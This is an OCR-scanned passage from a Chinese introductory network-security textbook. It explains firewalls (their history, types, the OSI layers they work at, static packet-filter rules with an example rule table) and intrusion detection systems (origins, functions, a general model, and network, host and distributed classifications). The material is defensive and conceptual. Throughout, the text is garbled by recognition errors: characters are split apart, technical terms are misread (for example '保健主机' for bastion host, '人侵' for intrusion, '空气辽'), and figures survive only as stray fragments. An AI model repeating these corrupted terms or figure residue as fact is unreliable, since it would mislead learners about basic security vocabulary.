1. 防火 墙 概述 

防火 墙 是 由 软件 和 硬件 组 成 的 系统 , 它 处 于 安全 的 网 络 (通常 是 内 部 局 域 网 ) 和 不 安 
全 的 网 络 (通常 是 Internet, 但 不 局 限于 Internet) 之 间 , 根 据 由 系统 管理 员 设 置 的 访问 控 
制 规则 ,对 数据 流 进行 过 滤 。 
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由 于 防火 墙 置 于 两 个 网 络 之 间 , 因 此 从 一 个 网 络 到 另 一 个 网 络 的 所 有 数据 流 都 要 流 
经 防火 墙 。 根 据 安全 策略 ,防火 墙 对 数据 流 的 处 理 方式 有 3 种 : 允许 数据 流通 过 ;@ 拒 
绝 数据 流通 过 ;G@ 将 这 些 数据 流 丢弃 。 当 数据 流 被 拒绝 时 ,防火墙 要 向 发 送 者 回复 一 条 消 
息 ,提示 发 送 者 该 数据 流 已 被 拒绝 。 当 数据 流 被 丢弃 时 ,防火 墙 不 会 对 这 些 数据 包 进行 任 
何 处 理 , 也 不 会 向 发 送 者 发 送 任何 提示 信息 。 丢 弃 数据 包 的 做 法 加 长 了 网 络 扫描 所 花费 
的 时 间 ,发 送 者 只 能 等 待 回应 直至 通信 超时 。 

防火 墙 是 Internet 安全 的 最 基本 组 成 部 分 。 但 是 ,我 们 必须 要 牢记 , 仅 采用 防火 墙 并 
不 能 给 整个 网 络 提供 全 局 的 安全 性 。 对 于 防御 内 部 的 攻击 ,防火墙 显得 无 能 为 力 , 同 样 对 
于 那些 绕 过 防火 墙 的 连接 (如 某 些 人 通过 拨号 上 网 ) ,防火 墙 则 毫 无 用 武之 地 。 

此 外 ,网 络 管理 员 在 配置 防火 墙 时 ,必须 允许 一 些 重要 的 服务 通过 ,和 否则 内 部 用 户 就 
不 可 能 接 入 Internet ,也 不 能 收发 电子 邮件 。 事 实 上 ,虽然 防火 墙 为 某 些 业务 提供 了 一 个 
通道 ,但 这 也 为 潜在 的 攻击 者 提供 了 攻击 内 部 网 络 的 机 会 。 攻 击 者 可 能 利用 此 通道 对 内 
部 网 络 发 起 攻击 ,或 者 注入 病毒 和 木马 。 

由 于 防火 墙 是 放置 在 两 个 网 络 之 间 的 网 络 安全 设备 ,因此 以 下 要 求 必 须 得 到 满足 ， 

。 所 有 进出 网 络 的 数据 流 都 必须 经 过 防火 墙 。 

。 只 允许 经 过 授权 的 数据 流通 过 防火 墙 。 

。 防火墙 自身 对 入侵 是 免疫 的 。 

防火 墙 不 是 一 台 普 通 的 主机 , 它 自身 的 安全 性 要 比 普通 主机 更 高 。 虽 然 NIS 
(Network Information Service) ,rlogin 等 服务 能 为 普通 网 络 用 户 提供 非常 大 的 便利 ,但 
是 应 严禁 防火 墙 为 用 户 提 供 这 些 危 险 的 服务 。 因 此 ,那些 与 防火 墙 的 功能 实现 不 相关 但 
又 可 能 给 防火 墙 自身 带 来 安全 威胁 的 网 络 服务 和 应 用 程序 ,都 应 当 从 防火 墙 中 剥离 出 去 。 

此 外 ,网 络 管理 员 在 配置 防火 墙 时 所 采用 的 默认 安全 策略 是 : 凡是 没有 明确 “允许 
的 ”服务 ,一 律 都 是 “禁止 的 ”。 防 火 墙 的 管理 员 不 一 定 比 普通 的 系统 管理 员 高 明 , 但 他 们 
对 网 络 的 安全 性 更 加 敏感 。 普 通 的 用 户 只 关心 自己 的 计算 机 是 否 安全 ,而 网 络 管理 员 关 
注 的 是 整个 网 络 的 安全 。 网 络 管理 员 通过 对 防火 墙 进行 精心 配置 ,可 以 使 整个 网 络 获得 
相对 较 高 的 安全 性 。 

众所周知 ,防火 墙 能 够 提高 内 部 网 络 的 安全 性 .但 这 并 不 意味 着 主机 的 安全 不 重要 。 
即使 防火 墙 密 不 透风 , 且 网 络 管理 员 的 配置 操作 从 不 出 错 , 网 络 安全 问题 也 依然 存在 , 因 
为 Internet 并 不 是 安全 风险 的 唯一 源泉 ,有 些 安全 威胁 就 来 自 网 络 内 部 。 内 部 黑客 可 能 
从 网 络 内 部 发 起 攻击 ,这 是 一 种 更 加 严重 的 安全 风险 。 除 内 部 攻击 之 外 ,外 部 攻击 者 也 企 
图 穿越 防火 墙 攻 入 内 部 网 络 。 例 如 ,黑客 可 以 通过 拨号 经 调制 解 调 器 池 进 入 网 络 ,并 从 网 
络 内 部 对 防火 墙 和 主机 发 起 攻击 。 因 此 ,必须 对 
内 部 主机 施加 适当 的 安全 策略 ,以 加 强 对 内 部 主 
机 的 安全 防护 。 也 就 是 说 ,在 采用 防火 墙 将 内 部 
网 络 与 外 部 网 络 加 以 隔离 的 同时 ,还 应 确保 内 部 
网 络 中 的 关键 主机 具有 足够 的 安全 性 。 

一 般 来 说 ,防火 墙 由 几 个 部 分 构成 。 在 

图 3-6 中 ,过 滤器 "用 来 阻 断 某 些 类 型 的 数据 伟 Eve GRUCERUEM 
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输 。 网 关 则 由 一 台 或 几 台 机 器 构成 ,用 来 提供 中 继 服务 ,以 补偿 过 滤器 带 来 的 影响 。 把 网 
关 所 在 的 网 络 称 为 “ 非 军 事 区 ”(Demilitarized Zone,DMZ) 。DMZ 中 的 网 关 有 时 会 得 到 
内 部 网 关 的 支援 。 通 常 , 网 关 通 过 内 部 过 滤器 与 其 他 内 部 主机 进行 开放 的 通信 。 在 实际 
情况 下 ,不 是 省 略 了 过 滤器 就 是 省 略 了 网 关 , 具 体 情况 因 防 火 墙 的 不 同 而 异 。 一 般 来 说 ， 
外 部 过 滤器 用 来 保护 网 关 免 受 侵害 ,而 内 部 过 滤器 用 来 防备 因 网 关 被 攻破 而 造成 恶果 。 
单个 或 两 个 网 关 都 能 够 保护 内 部 网 络 免 遭 攻击 。 通 常 把 暴露 在 外 的 网 关 主 机 称 为 保健 主 
机 。 目 前 市 场 上 常见 的 防火 墙 都 有 3 个 或 3 个 以 上 的 接口 ,同时 发 挥 了 两 个 过 滤器 和 网 
关 的 功能 ,通过 不 同 的 接口 实现 DMZ 区 和 内 部 网 络 的 划分 。 从 某 种 角度 看 ,这 种 方式 使 
防火 墙 的 管理 和 维护 更 加 方便 ,但 是 一 旦 防火 墙 受到 攻击 ,DMZ 和 内 部 网 络 的 安全 性 会 
同时 失去 保障 。 所 以 安全 性 与 易 用 性 往往 相互 矛盾 ,关键 在 于 使 用 者 的 取舍 。 

实质 上 ,防火 墙 是 一 种 访问 控制 设备 或 软件 。 它 可 以 是 一 个 硬件 的 “盒子 ”, 也 可 以 是 
一 个 “软件 "。 今 天 ,许多 设备 中 均 含 有 简单 的 防火 墙 功能 ,如 路 由 器 .调制解调器 Lo E 
站 IP 交换 机 等 。 许 多 流行 的 操作 系统 中 也 含有 软件 防火 墙 。 它 们 可 以 是 Windows 上 
运行 的 客户 端 软件 ,也 可 能 是 在 UNIX 内 核 中 实现 的 一 系列 过 滤 规 则 。 


2. 防火 墙 分 类 

防火 墙 的 发 展 经 历 了 近 30 年 的 时 间 。 第 一 代 防 火 墙 始 于 1985 年 前 后 , 它 几 乎 与 路 
由 器 同时 出 现 ,由 Cisco 的 IOS 软件 公司 研制 。 这 一 代 防 火 墙 称 为 包 过 滤 防 火 墙 。 

1990 年 前 后 ,AT&T 贝尔 实验 室 的 Dave Presotto 和 Howard Trickey 率先 提出 了 
基于 电路 中 继 的 第 二 代 防 火 墙 结构 ,此 类 防火 墙 被 称 为 电路 级 网 关 防 火 墙 。 但 是 ,他 们 既 
没有 发 表 描 述 这 一 结构 的 任何 文章 ,也 没有 发 布 基于 这 一 结构 的 任何 产品 。 

第 三 代 防 火 墙 结构 是 在 20 世纪 80 年 代 末 和 20 世纪 90 年 代 初 由 Purdue University 
的 Gene Spafford、.AT&T 贝尔 实验 室 的 Bill Cheswick 和 Marcus Ranum 分 别 研究 和 开 
发 的 。 这 一 代 防 火 墙 被 称 为 应 用 级 网 关 防 火 墙 。1991 4E. Ranum 的 文章 引起 了 人 们 的 
广泛 关注 。 此 类 防火 墙 采用 了 在 堡垒 主机 运行 代理 服务 的 结构 。 根 据 这 一 研究 成 果 ， 
DEC 公司 推出 了 第 一 个 商用 产品 SEAL。 

大 约 在 1991 年 ,Bill Cheswick 和 Steve Bellovin 开始 了 对 动态 包 过 滤 防 火 墙 的 研究 。 
1992 年 ,在 USC 信息 科学 学 院 工作 的 Bob Braden 和 Annette DeSchon 开始 研究 用 于 
Visas 系统 的 动态 包 过 滤 防 火 墙 ,后 来 它 演 变 为 目前 的 状态 检测 防火 墙 。1994 年 ,以 色 列 
的 Check Point Software 公司 推出 了 基于 第 四 代 结 构 的 第 一 个 商用 产品 。 

关于 第 五 代 防 火 墙 ,目前 尚未 有 统一 的 说 法 ,关键 在 于 目前 还 没有 出 现 获 得 广泛 认可 
的 新 技术 。 一 种 观点 认为 ,1996 年 由 Global Internet Software Group 公司 的 首席 科学 家 
Scott Wiegel 开始 启动 的 内 核 代理 结构 (Kernel Proxy Architecture) 研究 计划 属于 第 五 
代 防 火 墙 。 还 有 一 种 观点 认为 ,1998 年 由 NAI 公司 推出 的 自 适应 代理 (Adaptive Proxy) 
技术 给 代理 类 型 的 防火 墙 赋予 了 全 新 的 意义 ,可 以 称 之 为 第 五 代 防 火 墙 。 

根据 防火 墙 在 网 络 协议 栈 中 的 过 滤 层 次 不 同 , 通 常 把 防火 墙 分 为 3 Bh. 包 过 滤 防 火 
墙 .电路 级 网 关 防 火 墙 和 应 用 级 网 关 防 火 墙 。 每 种 防火 墙 的 特性 均 由 它 所 控制 的 协议 层 
决定 。 实 际 上 ,这 种 分 类 其 实 非常 模糊 。 例 如 , 包 过 滤 防 火 墙 运行 于 IP 层 ,但 是 它 可 以 窥 

115 


e 网 络 空间 安全 导论 ee 


视 TCP 信息 ,而 这 一 操作 又 发 生 在 电路 层 。 对 于 某 些 应 用 级 网 关 , 由 于 设计 原理 自身 就 
存在 局 限 性 ,因此 它们 必须 使 用 包 过 滤 防 火 墙 的 某 些 功能 。 

防火 墙 所 能 提供 的 安全 保护 等 级 与 其 设计 结构 息息相关 。 一 般 来 讲 , 大 多 数 市 面 上 
销售 的 防火 墙 产品 包含 以 下 一 种 或 多 种 防火 墙 结构 ，。 

。 静态 包 过 滤 。 

。 dst. 

。 电 路 级 网 关 。 

。 应 用 层 网 关 。 

。 状态 检查 包 过 滤 。 

。 切换 代理 。 

。 空气 辽 。 

防火 墙 对 开放 系统 互 连 (Open System Interconnection ,OSI) 模 型 中 各 层 协议 所 产生 
的 信息 流 进行 检查 。 要 了 解 防火 墙 是 哪 种 类 型 的 结构 ,关键 是 要 知道 防火 墙 工 作 于 OSI 
模型 的 哪 一 层 上 。 图 3-7 给 出 了 OSI 模型 与 防火 墙 类 型 的 关系 。 一 般 来 说 ,防火 墙 工作 
于 OSI 模型 的 层次 越 高 ,其 检查 数据 包 中 的 信息 就 越 多 ,因此 防火 墙 所 消耗 的 处 理 器 工 
作 周 期 就 越 长 。 防 火 墙 检查 的 数据 包 越 靠近 OSI 模型 的 上 层 , 该 防火 墙 结构 所 提供 的 安 
全 保护 等 级 就 越 高 ,因为 在 高 层 上 能 够 获得 更 多 的 信息 用 于 安全 决策 。 


OSI 模型 TCP/IP 模 型 

应 用 级 网 关 应 用 层 
表示 层 FTP | Telnet | SMTP | 其 他 
会 话 层 

| 电路 级 网 关 | um TCP — UDP 

云 

网 络 层 

tuti 
链 路 层 以 太 网 | FDDI | X.25 | 其 他 
物理 层 


图 3-7 OSI 模型 与 防火 墙 类 型 的 关系 


图 3-7 也 显示 了 TCP/IP 模型 与 OSI 模型 之 间 的 对 应 关系 ,从 图 中 可 以 看 出 ,OSI 模 
型 与 TCP/IP 模型 之 间 并 不 存在 一 一 对 应 的 关系 。 防 火 墙 通常 建立 在 TCP/IP 模型 基础 
上 。 为 了 更 深入 地 考察 防火 墙 的 结构 ,下 面 首 先 看 一 下 IP 数据 包 的 构成 。IP 数据 包 结 
构 如 图 3-8 Bros , 它 由 以 下 几 个 部 分 组 成 : 

。1IP 头 。 

。TCP 头 。 

。 应 用 级 头 。 

。 数据 / 净 荷 头 。 

图 3-9 和 图 3-10 详细 描述 了 IP 头 和 TCP 头 包含 的 数据 信息 。 

防火 墙 从 诞生 至 今 ,经 过 了 好 几 代 的 发 展 ,现在 的 防火 墙 已 经 与 最 初 的 防火 墙 大 不 相 
同 。 防火 墙 理 论 仍 在 不 断 完善 ,防火 墙 功能 也 随 着 硬件 性 能 的 提升 而 不 断 增强 。 目 前 的 
防火 墙 甚至 集成 了 VPN 及 IDS 等 功能 .防火 墙 在 网 络 安全 中 扮演 的 角色 越 来 越 多 ,地 位 
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源 /目的 了 地 址 | 源 /目的 端口 | 应 用 状态 和 数据 流 | 。 净 荷 
X | TO 应 用 级 头 xdi 
图 3-8 数据 包 结构 


= | 
0 [4 8 ll2 [16 |20 24 |28 
1 版 本 | WIL | 服务 类 型 | 整个 数据 包 长 度 
2 识别 符 | 标志 | sme 
量 | 3| 生存 时 间 协议 | 头 之 校 验 和 3 
Ba 数据 源 地 址 E: 
5 数据 目的 地 址 
6 选项 填充 
数据 从 这 儿 开始 


3-9 JP 首部 数据 段 


Words 
Header 


偏 移 值 | 保留 位 标志 位 视窗 
校 验 和 紧急 指针 


数据 从 这 儿 开 始 


图 3-10 TCP 头 部 数据 段 


也 越 来 越 重 要 。 


3. 防火 墙 原理 简介 

这 里 仅 介绍 静态 包 过 滤 防 火 墙 的 工作 原理 。 静 态 包 过 滤 防 火 墙 采用 一 组 过 滤 规 则 对 
每 个 数据 包 进 行 检查 ,然后 根据 检查 结果 确定 是 转发 .拒绝 还 是 丢弃 该 数据 包 。 这 种 防火 
墙 对 从 内 网 到 外 网 和 从 外 网 到 内 网 两 个 方向 的 数据 包 进 行 过 滤 , 其 过滤 规则 基于 IP 与 
TCP/UDP 头 中 的 几 个 字段 。 图 3-11 说 明了 静态 包 过 滤 防 火 墙 的 设计 思想 。 

静态 包 过 滤 防 火 墙 的 操作 如 图 3-12 所 示 ,主要 实现 如 下 3 个 主要 功能 。 

(D 接收 每 个 到 达 的 数据 包 。 

@ 对 数据 包 采 用 过 滤 规 则 ,对 数据 包 的 IP 头 和 传输 字段 内 容 进 行 检查 。 如 果 数 据 
包 的 头 信息 与 一 组 规则 匹配 , 则 根据 该 规则 确定 是 转发 还 是 丢弃 该 数据 包 。 

@ 如 果 没有 规则 与 数据 包头 信息 匹配 , 则 对 数据 包 施加 默认 规则 。 默 认 规则 可 以 丢 
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3-11 静态 包 过 滤 防 火 墙 的 设计 思想 


EBENEN P| 国 国 国 国 


输出 包 输入 包 


接收 每 个 数据 包 ， 应 用 规则 ， 如 果 规则 
不 存在 ， 则 应 用 默认 规则 


图 3-12 静态 包 过 滤 防 火 墙 的 操作 


弃 或 接收 所 有 数据 包 。 默 认 丢 弃 数 据 包 规则 更 严格 ,而 默认 接收 数据 包 规则 更 开放 。 通 
常 ,防火 墙 首 先 默认 丢弃 所 有 数据 包 , 然 后 再 逐个 执行 过 滤 规 则 ,以 加 强 对 数据 包 的 过 滤 。 

静态 包 过 滤 防 火 墙 是 最 原始 的 防火 墙 ,静态 数据 包 过 滤 发 生 在 网 络 层 ,也 就 是 OSI 
模型 的 第 3 层 , 如 图 3-13 所 示 。 


应 用 层 
表示 层 
会 话 层 
传输 层 
网 络 层 
链 路 层 
物理 层 


内 部 网 络 网 络 接口 网 络 接口 外 部 网 络 


图 3-13 工作 于 网 络 层 的 静态 包 过 滤 


对 于 静态 包 过 滤 防火 墙 来 说 ,决定 接收 还 是 拒绝 一 个 数据 包 , 取 决 于 对 数据 包 中 IP 
头 和 协议 头等 特定 域 的 检查 和 判定 。 这 些 特定 域 包括 : 四 数据 源 地 址 ;四 目的 地 址 ; 
图 应 用 或 协议 ; 田 源 端口 号 ;@ 目 的 端口 号 。 静 态 包 过 滤 防 火 墙 IP 数据 包 结构 如 图 3-14 
所 示 。 

在 每 个 包 过 滤器 上 ,安全 管理 员 要 根据 企业 的 安全 策略 定义 一 个 表单 ,这 个 表单 也 被 
称 为 访问 控制 规则 库 。 该 规则 库 包 含 许多 规则 ,用 来 指示 防火 墙 应 该 拒绝 还 是 接收 该 数 
据 包 。 在 转发 某 个 数据 包 之 前 , 包 过 滤器 防火 墙 将 IP 头 和 TCP 头 中 的 特定 域 与 规则 库 
中 的 规则 逐条 进行 比较 。 防 火 墙 按照 一 定 的 次 序 扫描 规则 库 , 直 到 包 过 滤器 发 现 一 个 特 
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| 源 /目的 地 址 | 源 /目的 端口 | 应 用 状态 和 数据 流 | 净 荷 1 
IP 头 TCP 头 应 用 级 头 数据 


包 过 滤器 
3-14 静态 包 过 滤 防 火 墙 IP 数据 包 结构 


定 域 满足 包 过 滤 规 则 的 特定 要 求 时 , 才 对 数据 包 做 出 “接收 ?或 “丢弃 ?的 判决 。 如 果 包 过 
滤器 没有 发 现 一 个 规则 与 该 数据 包 匹 配 .那么 它 将 对 其 施加 一 个 默认 规则 。 该 默认 规则 
在 防火 墙 的 规则 库 中 有 明确 的 定义 ,一 般 情况 下 防火 墙 将 不 满足 规则 的 数据 包 丢 弃 。 
图 3-15 为 一 个 静态 包 过 滤 防 火 墙 规则 表 .。 该 过 滤 规则 表决 定 是 允许 转发 还 是 丢弃 数据 
包 。 根 据 该 规则 表 ,静态 包 过 滤 防 火 墙 采取 的 过 滤 动作 如 下 : 

CD 拒绝 来 自 130.33.0.0 的 数据 包 , 这 是 一 种 保守 策略 。 

Q 拒绝 来 自 外 部 网 络 的 Telnet 服务 (端口 号 为 23) 的 数据 包 。 

G 拒绝 试图 访问 内 网 主机 193.77.21.9 的 数据 包 。 

@ 禁止 HTTP 服务 (端口 号 为 80) 的 数据 包 输 出 ,此 规则 表明 ,该 公司 不 允许 员工 浏 


览 Internet。 


Internet 内 部 网 络 
接口 接口 2 
Interface Source IP Source port Destination IP | Destination port 
1 130.33.0.0 * * * 
1 * 23 
1 * * 
2 * * * 80 


图 3-15 ”静态 包 过 滤 防 火 墙 规则 表 


包 过 滤器 的 工作 原理 非常 简单 , 它 根据 数据 包 的 源 地 址 、 目 的 地 址 或 端口 号 确定 是 否 
丢弃 数据 包 。 也 就 是 说 ,判决 仅 依赖 于 当前 数据 包 的 内 容 。 根 据 所 用 路 由 器 的 类 型 ,过滤 
可 以 发 生 在 网 络 信 口 处 :也 可 以 发 生 在 网 络 出 口 处 ,或 者 在 入 口 和 出 口 同时 对 数据 包 进行 
过 滤 。 网 络 管理 员 可 以 事先 准备 好 一 个 访问 控制 列表 ,其 中 明确 规定 哪些 主机 或 服务 是 
可 接受 的 ,哪些 主机 或 服务 是 不 可 接受 的 。 采 用 包 过 滤器 ,能 够 非常 容易 地 做 到 在 网 络 层 
上 允许 或 拒绝 主机 的 访问 。 例 如 ,可 以 做 到 允许 主机 A 和 主机 B 互 访 ,或 者 拒绝 除 主机 
A 之 外 的 其 他 主机 访问 主机 B. 
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3.2.2 入侵 检测 系统 


1. 入 侵 检 测 系统 概述 

人 侵 检 测 系统 (Intrusion Detection System,IDS) 的 发 展 已 有 40 年 历史 。1980 年 4 
月 ,James P. Anderson 为 美国 空军 做 了 一 份 题 为 Computer Security Threat Monitoring 
and Surveillance (计算 机 安全 威胁 监控 与 监视 ) 的 技术 报告 ,第 一 次 详细 阐述 了 入 侵 检 测 
的 概念 。 他 提出 了 一 种 对 计算 机 系统 风险 和 威胁 进行 分 类 的 方法 ,并 将 威胁 分 为 外 部 渗 
透 、 内 部 渗透 和 不 法 行为 3 种 ,还 提出 了 利用 审计 跟踪 数据 监视 人 侵 活动 的 思想 。 这 份 报 
告 被 公认 为 是 入 侵 检测 的 开山 之 作 。 

从 1984 年 到 1986 年 ,乔治 敦 大 学 的 Dorothy Denning 和 SRI/CSL(SRI 公司 计算 机 
科学 实验 室 ) 的 Peter Neumann 研究 设计 了 一 个 实时 入 侵 检测 系统 模型 , 取 名 为 人 侵 检 
测 专家 系统 (Intrusion Detection Expert System,IDES) 。 该 模型 由 6 个 部 分 组 成 : 主体 、 
对 象 . 审 计 记 录 、 轮 廓 特征 .异常 记录 和 活动 规则 。1988 4E. SRI/CSL 的 Teresa Lunt 等 
人 改进 了 Denning 的 入 侵 检测 模型 ,并 开发 出 了 一 个 新 型 的 IDES。 该 系统 包括 一 个 异常 
探测 器 和 一 个 专家 系统 ,分 别 用 于 统计 异常 模型 的 建立 和 基于 规则 的 特征 分 析 检 测 。 

1990 年 是 入 侵 检 测 系统 发 展 史 上 的 一 个 分 水 岭 , 加 州 大 学 戴 维 斯 分 校 的 L.T. 
Heberlein 等 人 开发 出 了 网 络 安全 监视 器 (Network Security Monitor,NSM) 。 该 系统 第 
一 次 直接 将 网 络 流 作 为 审计 数据 来 源 , 因 而 可 以 在 不 将 审计 数据 转换 成 统一 格式 的 情况 
下 监控 异种 主机 。 此 后 ,入 侵 检 测 系统 发 展 史 翻 开 了 新 的 一 页 ,两 大 阵营 正式 形成 : 基于 
网 络 的 IDS 和 基于 主机 的 IDS。 

入 侵 检测 是 对 传统 安全 产品 的 合理 补充 ,帮助 系统 对 付 网 络 攻击 ,扩展 了 系统 管理 员 
的 安全 管理 能 力 (包括 安全 审计 ,监视 .进行 识别 和 响应 ) ,提高 了 信息 安全 基础 结构 的 完 
整 性 。 它 从 计算 机 网 络 系统 中 的 若干 关键 点 收集 信息 ,并 分 析 这 些 信 息 ,查看 网 络 中 是 否 
有 违反 安全 策略 的 行为 和 唱 到 袭击 的 迹象 。 入 侵 检 测 被 认为 是 防火 墙 之 后 的 第 二 道 安全 
闸门 ,能 在 不 影响 网 络 性 能 的 情况 下 对 网 络 进 行 监测 ,从 而 提供 对 内 部 攻击 、 外 部 攻击 和 
误 操 作 的 实时 保护 。 以 上 功能 都 是 通过 执行 以 下 任务 来 实现 : 

CD 监视 ,分 析 用 户 及 系统 的 活动 。 

@ 系统 构造 和 弱点 的 审计 。 

@ 识别 反映 已 知 进攻 的 活动 模式 并 向 相关 人 员 报 警 。 

(D 异常 行为 模式 的 统计 分 析 。 

C) 评估 重要 系统 和 数据 文件 的 完整 性 。 

@ 操作 系统 的 审计 跟踪 管理 ,并 识别 用 户 违 反 安全 策略 的 行为 。 

对 于 一 个 成 功 的 入 侵 检 测 系统 来 说 , 它 不 但 可 以 使 系统 管理 员 时 刻 了 解 网 络 系统 ( 包 
括 程序 文件 和 硬件 设备 ) 的 任何 变更 ,还 能 给 网 络 安全 策略 的 制定 提供 依据 。 更 为 重要 
的 是 , 它 应 该 易于 管理 .配置 简单 ,即使 非 专业 人 员 也 易于 使 用 。 而 且 , 入 侵 检测 的 规模 还 
应 根据 网 络 威胁 .系统 构造 和 安全 需求 的 改变 而 改变 。 入 侵 检 测 系统 在 发 现 人 侵 后 会 及 
时 做 出 响应 ,包括 切断 网 络 连接 .记录 事件 和 报警 等 。 

IDS 的 主要 功能 如 下 : 
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CD 网 络 流量 的 跟踪 与 分 析 功 能 。 跟 踪 用 户 进出 网 络 的 所 有 活动 ,实时 检测 并 分 析 用 
户 在 系统 中 的 活动 状态 :实时 统计 网 络 流量 ,检测 拒绝 服务 攻击 等 异常 行为 。 

Q 已 知 攻击 特征 的 识别 功能 。 识 别 特定 类 型 的 攻击 ,并 向 控制 台 报 警 ,为 防御 提供 
依据 。 根 据 定制 的 条 件 过 滤 重 复 警 报 事件 ,减轻 传输 与 响应 的 压力 。 

C) 异常 行为 的 分 析 、 统 计 与 响应 功能 。 分 析 系 统 的 异常 行为 模式 ,统计 异常 行为 ,并 
对 异常 行为 做 出 响应 。 

@ 特征 库 的 在 线 和 离线 升级 功能 。 提 供 入 侵 检 测 规则 在 线 和 离线 升级 ,实时 更 新 人 
侵 特征 库 , 不 断 提 高 IDS 的 入 侵 检 测 能 力 。 

C» 数据 文件 的 完整 性 检查 功能 。 检 查 关键 数据 文件 的 完整 性 ,识别 并 报告 数据 文件 
的 改动 情况 。 

€) 自 定义 的 响应 功能 。 定 制 实时 响应 策略 ;根据 用 户 定义 ,经 过 系统 过 滤 , 对 警报 事 
件 及 时 响应 。 

CD 系统 漏洞 的 预报 警 功能 。 对 未 发 现 的 系统 漏洞 特征 进行 预报 警 。 

@ IDS 探测 器 集中 管理 功能 。 通 过 控制 台 收 集 探测 器 的 状态 和 报警 信息 ,控制 各 个 
探测 器 的 行为 。 

一 个 高 质量 的 IDS 产品 除了 具备 以 上 入 侵 检测 功能 外 ,还 必须 具备 较 高 的 可 管理 性 
和 自身 安全 性 等 功能 。 

所 有 能 够 执行 和 人 侵 检 测 任 务 和 实现 人 侵 检 测 功 能 的 系统 都 可 称 为 人 侵 检 测 系统 
(Intrusion Detection System,IDS) ,其 中 包括 软件 系统 或 软 ,硬件 结合 的 系统 。 一 个 通用 
的 入侵 检测 系统 模型 如 图 3-16 所 示 。 


知识 库 
配置 信息 检测 器 “| ~ | sm 
i i 
数据 收集 器 ] 。 控制 动作 
上 市 计数 据 等 
目标 系统 


图 3-16 通用 的 入 侵 检 测 系统 模型 


在 图 3-16 中 ,通用 入 侵 检测 系统 模型 主要 由 4 个 部 分 组 成 。 

CD 数据 收集 器 (又 称 探测 器 ) 。 主 要 负责 收集 数据 。 探 测 器 的 输入 数据 流 包 括 任何 
可 能 包含 人 侵 行为 线索 的 系统 数据 ,如 各 种 网 络 协议 数据 包 、. 系 统 日 志文 件 和 系统 调用 记 
录 等 。 探 测 器 将 这 些 数 据 收 集 起 来 ,然后 再 发 送 到 检测 器 进行 处 理 。 

Q 检测 器 (又 称 分 析 器 或 检测 引擎 ) 。 负 责 分 析 和 检测 人 侵 的 任务 ,并 向 控制 器 发 出 
警报 信号 。 

@ 知识 库 。 为 检测 器 和 控制 器 提供 必需 的 数据 信息 支持 。 这 些 信 息 包括 : 用 户 历 
史 活 动 档案 或 检测 规则 集合 等 。 

CD 控制 器 。 根 据 从 检测 器 发 来 的 警报 信号 ,人 工 或 自动 地 对 入 侵 行为 做 出 响应 。 
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此 外 ,大 多 数 入 侵 检测 系统 都 会 包含 一 个 用 户 接口 组 件 , 用 于 观察 系统 的 运行 状态 和 
输出 信号 ,并 对 系统 的 行为 进行 控制 。 


2. 入 侵 检 测 系统 分 类 

根据 数据 来 源 的 不 同 ,IDS 可 以 分 为 以 下 3 种 基本 结构 : 

CD 基于 网 络 的 入 侵 检 测 系统 (Network Intrusion Detection System,NIDS) 。 数 据 来 
源 于 网 络 上 的 数据 流 。NIDS 能 够 截获 网 络 中 的 数据 包 , 提 取 其 特征 并 与 知识 库 中 已 知 
的 攻击 签名 相 比 较 , 从 而 达到 检测 目的 。 其 优点 是 侦 测速 度 快 .隐蔽 性 好 、 不 易 受 到 攻击 、 
对 主机 资源 消耗 少 ;缺点 是 有 些 攻击 是 由 服务 器 的 键盘 发 出 的 ,不 经 过 网 络 , 因 而 无 法 识 
别 , 误 报 率 较 高 。 

@ 基于 主机 的 入 侵 检 测 系 统 (Host Intrusion Detection System. HIDS)。 数 据 来 源 
于 主机 系统 ,通常 是 系统 日 志和 审计 记录 。HIDS 通过 对 系统 日 志和 审计 记录 的 不 断 监 
控 和 分 析 来 发 现 攻击 后 的 误 操 作 。 优 点 是 针对 不 同 操作 系统 捕获 应 用 层 和 人 侵 , 误 报 少 ; 缺 
点 是 依赖 于 主机 及 其 子 系统 ,实时 性 差 。HIDS 通常 安装 在 被 保护 的 主机 上 ,主要 对 该 主 
机 的 网 络 实时 连接 及 系统 审计 日 志 进 行 分 析 和 检查 ,在 发 现 可 疑 行为 和 安全 违规 事件 时 ， 
向 管理 员 报 警 , 以 便 采取 措施 。 

@ 分 布 式 人 侵 检测 系统 (Distributed Intrusion Detection System,DIDS) 。 这 种 系统 
能 够 同时 分 析 来 自主 机 系统 审计 日 志和 网 络 数 据 流 , 一 般 为 分 布 式 结构 ,由 多 个 部 件 组 
成 。DIDS 可 以 从 多 个 主机 获取 数据 ,也 可 以 从 网 络 传输 取得 数据 ,克服 了 单一 的 HIDS、 
NIDS 的 不 足 。 典 型 的 DIDS 采用 控制 台 /探测 器 结构 。NIDS 和 HIDS 作为 探测 器 放置 
在 网 络 的 关键 节点 ,并 向 中 央 控 制 台 汇报 情况 。 攻 击 日 志 定时 传送 到 控制 台 ,并 保存 到 中 
央 数 据 库 中 ,新 的 攻击 特征 能 及 时 发 送 到 各 个 探测 器 上 。 每 个 探测 器 能 够 根据 所 在 网 络 
的 实际 需要 配置 不 同 的 规则 集 。 

根据 入 侵 检测 的 策略 ,IDS 也 可 以 分 成 以 下 3 种 类 型 

CD 滥用 检测 。 滥 用 检测 (Misuse Detection) 就 是 将 收集 到 的 信息 与 已 知 的 网 络 入 侵 
和 系统 误 用 模式 数据 库 进行 比较 ,从 而 发 现 违 背 安 全 策略 的 问题 。 该 方法 的 优点 是 只 须 
收集 相关 的 数据 集合 ,可 显著 减少 系统 负担 , 且 技术 已 相当 成 熟 。 该 方法 存在 的 弱点 是 需 
要 不 断 地 升级 以 对 付 不 断 出 现 的 黑客 攻击 手段 ,不 能 检测 到 从 未 出 现 过 的 黑客 攻击 手段 。 

Q 异常 检测 。 异 常 检 测 (Abnormal Detection) 首先 给 系统 对 象 (如 用 户 .文件 .目录 
和 设备 等 ) 创 建 一 个 统计 描述 .统计 正常 使 用 时 的 一 些 测 量 属 性 (如 访问 次 数 .操作 失败 次 
数 和 延 时 等 )。 测 量 属性 的 平均 值 将 被 用 来 与 网 络 、 系 统 的 行为 进行 比较 ,如 果 观 察 值 在 
正常 范围 之 外 ,就 认为 有 入 侵 发 生 。 其 优点 是 可 检测 到 未 知 的 入 侵 和 更 加 复杂 的 入 侵 。 
缺点 是 误 报 \ 漏 报 率 高 , 且 不 适应 用 户 正常 行为 的 突然 改变 。 

@ 完整 性 分 析 。 完 整 性 分 析 (Integrality Analysis) 主要 关注 某 个 文件 或 对 象 是 否 被 
